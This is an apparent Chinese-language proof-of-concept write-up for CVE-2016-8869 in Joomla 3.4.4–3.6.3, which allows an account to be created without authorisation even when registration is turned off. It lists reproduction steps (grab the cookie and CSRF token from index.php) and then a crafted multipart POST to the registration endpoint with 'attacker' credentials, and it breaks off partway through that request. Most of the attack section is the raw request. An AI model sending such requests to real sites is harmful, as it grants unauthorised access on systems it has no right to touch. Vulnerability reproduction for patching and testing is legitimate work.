houyusen#poc#（CVE-2016-8869）Joomla 3.4.4-3.6.3 未授权创建特权用户1

（CVE-2016-8869）Joomla 3.4.4-3.6.3 未授权创建特权用户 ====================================================== 一、漏洞简介 ------------ 网站关闭注册的情况下仍可创建用户，默认状态下用户需要用邮件激活，但需要开启注册功能才能激活。 二、漏洞影响 ------------ Joomla 3.4.4-3.6.3 三、复现过程 ------------ - 首先在后台关闭注册功能，关闭后首页没有注册选项： Joomla3.4.4-3.6.3未授权创建特权用户/media/rId24.png) - .然后通过访问index.php抓包获取cookie，通过看index.php源码获取token： Joomla3.4.4-3.6.3未授权创建特权用户/media/rId25.png) - 构造注册请求： ```{=html} ``` POST /index.php/component/users/?task=registration.register HTTP/1.1 ... Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI ... Cookie: yourcookie ------WebKitFormBoundaryefGhagtDbsLTW5qI Content-Disposition: form-data; name="user[name]" attacker ------WebKitFormBoundaryefGhagtDbsLTW5qI Content-Disposition: form-data; name="user[username]" attacker ------WebKitFormBoundaryefGhagtDbsLTW5qI Content-Disposition: form-data; name="user[password1]" attacker ------WebKitFormBoundaryefGhagtDbsLTW5qI Content-Disposition: form-data; name="user[password2]" attacker ------WebKitFormBoundaryefGhagtDbsLTW5qI Content-Disposition: form-data; name="user[email1]" [email protected] ------WebKitFormBoundaryefGhagtDbsLTW5qI Content-Disposition: form-data; name="user[email2]"